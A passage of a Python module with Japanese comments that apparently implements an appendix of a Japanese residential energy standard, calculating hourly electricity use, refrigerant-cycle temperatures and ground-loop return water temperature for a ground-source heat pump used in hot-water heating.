Theta_ref_evp_d_t = calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a) Mu_d_t = calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2) E_comp_hs_d_t, _ = get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t) # ---------- 熱源機の消費電力量 ---------- # 1時間当たりの熱源機の消費電力量 (kWh/h) (1) E_E_hs_d_t = E_comp_hs_d_t + E_pump_hs_d_t + E_aux_hs_d_t E_E_hs_d_t[q_out_H_hs_d_t == 0] = 0 return E_E_hs_d_t # ============================================================================ # N.3.2 ガス消費量 # ============================================================================ def get_E_G_hs_d_t(): """熱源機のガス消費量 Args: Returns: ndarray: 熱源機のガス消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.3 灯油消費量 # ============================================================================ def get_E_K_hs_d_t(): """熱源機の灯油消費量 Args: Returns: ndarray: 熱源機の灯油消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.4 その他の一次エネルギー消費量 # ============================================================================ def get_E_M_hs_d_t(): """熱源機のその他の燃料の一次エネルギー消費量 Args: Returns: ndarray: 熱源機のその他の燃料の一次エネルギー消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.4 圧縮機の消費電力量 # ============================================================================ def get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t): """日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Returns: ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 """ # 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c) k_comp_a = -0.7309 k_comp_b = 0.67 k_comp_c = 1.0319 # 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b) f_comp_act_d_t = np.clip(k_comp_a * qr_out_H_hs_d_t + (1 - k_comp_a * k_comp_b), 1, None) * k_comp_c # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a) E_comp_hs_d_t = f_comp_act_d_t * ((q_out_H_hs_d_t + q_loss_H_hs_d_t) / Mu_d_t) E_comp_hs_d_t[Theta_ref_evp_d_t >= Theta_ref_cnd_d_t] = 0 return E_comp_hs_d_t, f_comp_act_d_t def calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t): """日付dの時刻tにおける圧縮機の圧縮効率 (3a) Args: Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃) Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃) Returns: ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a) """ # Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_0 = get_K_Mu_h_0() # Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_1 = get_K_Mu_h_1() # Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_2 = get_K_Mu_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1) e_ref_H_th_d_t = calc_e_ref_H_th(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Mu_d_t = K_Mu_h_2 * (e_ref_H_th_d_t ** 2) + K_Mu_h_1 * e_ref_H_th_d_t + K_Mu_h_0 Mu_d_t[e_ref_H_th_d_t > 10] = K_Mu_h_2 * (10 ** 2) + K_Mu_h_1 * 10 + K_Mu_h_0 return Mu_d_t def get_K_Mu_h_0(): """Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return -0.430363368361459 def get_K_Mu_h_1(): """Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.698531770387591 def get_K_Mu_h_2(): """Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.0100164335768507 def calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) """ # Kevph0:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_0 = get_K_evp_h_0() # Kevph1:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_1 = get_K_evp_h_1() # Kevph2:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_2 = get_K_evp_h_2() # Kevph12:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_12 = get_K_evp_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Theta_ref_evp_d_t = np.clip(K_evp_h_0 + K_evp_h_1 * np.repeat(Theta_gsRW_d_ave_d, 24) + K_evp_h_2 * qr_out_H_hs_d_t + K_evp_h_12 * np.repeat(Theta_gsRW_d_ave_d, 24) * qr_out_H_hs_d_t, -50, None) return Theta_ref_evp_d_t def get_K_evp_h_0(): """Kevph0:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph0:蒸発温度を計算する式の係数 """ return -2.95315205817646 def get_K_evp_h_1(): """Kevph1:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph1:蒸発温度を計算する式の係数 """ return 0.915893610614308 def get_K_evp_h_2(): """Kevph2:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph2:蒸発温度を計算する式の係数 """ return -11.8319776584846 def get_K_evp_h_12(): """Kevph12:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph12:蒸発温度を計算する式の係数 """ return 0.29704275467947 def calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Args: qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃) """ # Kcndh0:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_0 = get_K_cnd_h_0() # Kcndh1:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_1 = get_K_cnd_h_1() # Kcndh2:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_2 = get_K_cnd_h_2() # Kcndh12:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_12 = get_K_cnd_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a) Theta_ref_cnd_d_t = np.clip(K_cnd_h_0 + K_cnd_h_1 * Theta_SW_d_t + K_cnd_h_2 * qr_out_H_hs_d_t + K_cnd_h_12 * Theta_SW_d_t * qr_out_H_hs_d_t, None, 65) return Theta_ref_cnd_d_t def get_K_cnd_h_0(): """Kcndh0:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh0:凝縮温度を計算する式の係数 """ return 3.6105623002886 def get_K_cnd_h_1(): """Kcndh1:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh1:凝縮温度を計算する式の係数 """ return 0.930136847064537 def get_K_cnd_h_2(): """Kcndh2:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh2:凝縮温度を計算する式の係数 """ return 0.494024927234563 def get_K_cnd_h_12(): """Kcndh12:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: ndarray: Kcndh12:凝縮温度を計算する式の係数 """ return 0.00770898511188855 def calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 往き温水温度 (℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) """ # Ksch0:過冷却度を計算する式の係数 (-) (6b) K_sc_h_0 = get_K_sc_h_0() # Ksch1:過冷却度を計算する式の係数 (-) (6b) K_sc_h_1 = get_K_sc_h_1() # Ksch2:過冷却度を計算する式の係数 (-) (6b) K_sc_h_2 = get_K_sc_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a) Theta_ref_SC_d_t = np.clip(K_sc_h_0 + K_sc_h_1 * Theta_SW_d_t + K_sc_h_2 * qr_out_H_hs_d_t, 0, None) return Theta_ref_SC_d_t def get_K_sc_h_0(): """Ksch0:過冷却度を計算する式の係数(-) (6b) Args: Returns: float: Ksch0:過冷却度を計算する式の係数(-) (6b) """ return -4.02655782981397 def get_K_sc_h_1(): """Ksch1:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch1:過冷却度を計算する式の係数 """ return 0.0894330494418674 def get_K_sc_h_2(): """Ksch2:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch2:過冷却度を計算する式の係数 """ return 14.3457831669162 def calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) """ # Kshh0:過熱度を計算する式の係数 (-) (7b) K_sh_h_0 = get_K_sh_h_0() # Kshh1:過熱度を計算する式の係数 (-) (7b) K_sh_h_1 = get_K_sh_h_1() # Kshh2:過熱度を計算する式の係数 (-) (7b) K_sh_h_2 = get_K_sh_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a) Theta_ref_SC_d_t = np.clip(K_sh_h_0 + K_sh_h_1 * qr_out_H_hs_d_t + K_sh_h_2 * np.repeat(Theta_gsRW_d_ave_d, 24), 0, None) return Theta_ref_SC_d_t def get_K_sh_h_0(): """Kshh0:過熱度を計算する式の係数(-) (7b) Args: Returns: float: Kshh0:過熱度を計算する式の係数 """ return 0.819643791668597 def get_K_sh_h_1(): """Kshh1:過熱度を計算する式の係数 (-) (7b) Args: Returns: float: Kshh1:過熱度を計算する式の係数 (-) """ return 2.99282570323758 def get_K_sh_h_2(): """Kshh2:過熱度を計算する式の係数 (-) (7b) Args: Returns: Kshh2:過熱度を計算する式の係数 (-) """ return -0.0762659183765636 # ============================================================================ # N.5 ポンプの消費電力量 # ============================================================================ def get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t): """日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) Args: E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h) """ # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) E_pump_hs_d_t = E_pump_SW_d_t + E_pump_gsRW_d_t return E_pump_hs_d_t def calc_E_pump_SW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) """ # apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) a_pump_SW = get_a_pump_SW() # bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) b_pump_SW = get_b_pump_SW() # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) E_pump_SW_d_t = a_pump_SW * qr_out_H_hs_d_t + b_pump_SW * (qr_out_H_hs_d_t ** 2) return E_pump_SW_d_t def get_a_pump_SW(): """apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.041972403 def get_b_pump_SW(): """bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.104478967 def calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) """ # apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) a_pump_gsRW = get_a_pump_gsRW() # bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) b_pump_gsRW = get_b_pump_gsRW() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) E_pump_gsRW_d_t = a_pump_gsRW * qr_out_H_hs_d_t + b_pump_gsRW * (qr_out_H_hs_d_t ** 2) return E_pump_gsRW_d_t def get_a_pump_gsRW(): """apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.062196275 def get_b_pump_gsRW(): """bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.071756474 # ============================================================================ # N.6 補機の消費電力量 # ============================================================================ def calc_E_aux_hs_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) """ # kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) kauxh0 = get_kauxh0() # kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) kauxh1 = get_kauxh1() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a) E_aux_hs_d_t = kauxh1 * qr_out_H_hs_d_t + kauxh0 return E_aux_hs_d_t def get_kauxh0(): """kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh0:補機の消費電力量を計算する式の係数 (-) """ return 0.0433205551083371 def get_kauxh1(): """kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh1:補機の消費電力量を計算する式の係数 (-) """ return 0.0173758330059922 # ============================================================================ # N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率 # ============================================================================ def get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA): """日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) Args: q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) """ # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = (q_out_H_hs_d_t * 10 ** 3) / q_max_H_hs_JRA return qr_out_H_hs_d_t # ============================================================================ # N.8 温水暖房用熱源機の平均暖房出力 # ============================================================================ def get_q_out_H_hs_d_t(Q_out_H_hs_d_t): """日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) Args: Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13) q_out_H_hs_d_t = Q_out_H_hs_d_t / 3600 * 10 ** 3 return q_out_H_hs_d_t def get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Args: Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h) Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14) return np.min([Q_dmd_H_hs_d_t, Q_max_H_hs_d_t], axis=0) def calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15) Args: Theta_SW_d_t(ndarray): 往き温水温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ---------- q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ---------- Q_max_H_hs_d_t = (-0.005635139785329 * Theta_SW_d_t + 0.0258983299329793 * np.clip(np.repeat(Theta_gsRW_d_ave_d, 24), 0, 20) + 0.836930642418471) * q_max_H_hs_JRA * 3600 * 10 ** (-6) return Q_max_H_hs_d_t # ============================================================================ # N.9 温水暖房用熱源機内の平均放熱損失 # ============================================================================ def get_q_loss_H_hs_d_t(): """日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) Args: Returns: float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) """ return 0 # ============================================================================ # N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 # ============================================================================ def calc_q_max_H_hs_JRA(q_max_hs): """地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) Args: q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲ Returns: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) """ # 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) f_crated = get_f_crated() # 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16) q_max_H_hs_JRA = q_max_hs * f_crated return q_max_H_hs_JRA def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh): """温水暖房用熱源機の定格能力 Args: region(int): 省エネルギー地域区分 A_A(float): 床面積の合計 (m2) A_MR(float): 主たる居室の床面積 (m2) A_OR(float): その他の居室の床面積 (m2) mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は' mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は' has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue Returns: float: 温水暖房用熱源機の定格能力 """ # 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh) def get_f_crated(): """地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) Args: Returns: float: 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) """ return 1.35 # ============================================================================ # N.11 地中熱交換器からの戻り熱源水の日平均温度 # ============================================================================ def get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H): """日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Args: K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) Returns: ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) """ # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Theta_gsRW_d_ave_d = K_gsRW_H * (Theta_ex_d_Ave_d - Theta_ex_H_Ave) + Theta_ex_a_Ave + Delta_Theta_gsRW_H return Theta_gsRW_d_ave_d def calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType): """暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 地中熱交換器タイプ Returns: float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) """ # 熱交換器タイプに応じた係数取得 a_gsRW_H = get_a_gsRW_H(HeatExchangerType) b_gsRW_H = get_b_gsRW_H(HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = a_gsRW_H * R_L_max + b_gsRW_H return Delta_Theta_gsRW_H def calc_K_gsRW_H(R_L_max, HeatExchangerType): """地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) """ # 熱交換器タイプに応じた係数取得 c_gsRW_H = get_c_gsRW_H(HeatExchangerType) d_gsRW_H = get_d_gsRW_H(HeatExchangerType) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = c_gsRW_H * R_L_max + d_gsRW_H return K_gsRW_H def get_a_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][0] elif HeatExchangerType == '2': return get_table_n_3()[1][0] elif HeatExchangerType == '3': return get_table_n_3()[2][0] elif HeatExchangerType == '4': return get_table_n_3()[3][0] elif HeatExchangerType == '5': return get_table_n_3()[4][0] else: raise ValueError(HeatExchangerType) def get_b_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][1] elif HeatExchangerType == '2': return get_table_n_3()[1][1] elif HeatExchangerType == '3': return get_table_n_3()[2][1] elif HeatExchangerType == '4': return get_table_n_3()[3][1] elif HeatExchangerType == '5': return get_table_n_3()[4][1] else: raise ValueError(HeatExchangerType) def get_c_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][2] elif HeatExchangerType == '2': return get_table_n_3()[1][2] elif HeatExchangerType == '3': return get_table_n_3()[2][2] elif HeatExchangerType == '4': return get_table_n_3()[3][2] elif HeatExchangerType == '5': return get_table_n_3()[4][2] else: raise ValueError(HeatExchangerType) def get_d_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][3] elif HeatExchangerType == '2': return get_table_n_3()[1][3] elif HeatExchangerType == '3': return get_table_n_3()[2][3] elif HeatExchangerType == '4': return get_table_n_3()[3][3] elif HeatExchangerType == '5': return get_table_n_3()[4][3] else: raise ValueError(HeatExchangerType) def get_table_n_3(): """表N.3 係数 Args: Returns: list: 表N.3 係数 """ table_n_3 = [ (3.1672, -0.4273, -0.0444, 0.0442), (5.9793, -1.0687, -0.1613, 0.1047), (8.3652, -1.5946, -0.2486, 0.1546), (9.9065, -2.1827, -0.3454, 0.2072), (10.2898, -2.8727, -0.3270, 0.2700) ] return table_n_3 def get_R_L_max(L_max_H, L_max_C): """1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) Args: L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d) L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d) Returns: float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) """ # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = (L_max_C - L_max_H) / (L_max_C + L_max_H) return R_L_max def get_L_max_H(L_H_x_t_i): """1日当たりの暖房負荷の年間最大値(MJ/d)(20b) Args: L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 Returns: float: 1日当たりの暖房負荷の年間最大値(MJ/d) """ # L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列 # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_H_x_t = np.sum(L_H_x_t_i, axis=0) # 1次元配列を2次元配列に形状変換する L_H_x_t = np.reshape(L_H_x_t, (365, 24)) # 時間軸合算 L_H_x = np.sum(L_H_x_t, axis=1) # 